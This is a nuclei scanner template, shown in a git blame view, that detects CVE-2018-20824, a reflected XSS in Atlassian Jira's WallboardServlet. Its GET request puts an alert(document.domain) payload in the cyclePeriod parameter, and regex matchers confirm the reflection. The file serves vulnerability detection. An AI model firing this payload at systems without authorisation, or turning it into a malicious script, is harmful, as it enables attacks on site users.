nuclei-templates/cves/2018/CVE-2018-20824.yaml

23 lines
735 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-20824
2020-06-22 13:35:37 +00:00
info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot & dwisiswant0
2020-06-22 13:35:37 +00:00
severity: medium
2020-08-25 22:22:08 +00:00
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
tags: cve,cve2018,atlassian,jira,xss
2020-06-22 13:35:37 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers-condition: and
2020-06-22 13:35:37 +00:00
matchers:
- type: status
status:
2020-06-22 21:51:54 +00:00
- 200
- type: regex
regex:
- (?mi)timeout:\salert\(document\.domain\)
2020-06-22 13:35:37 +00:00
part: body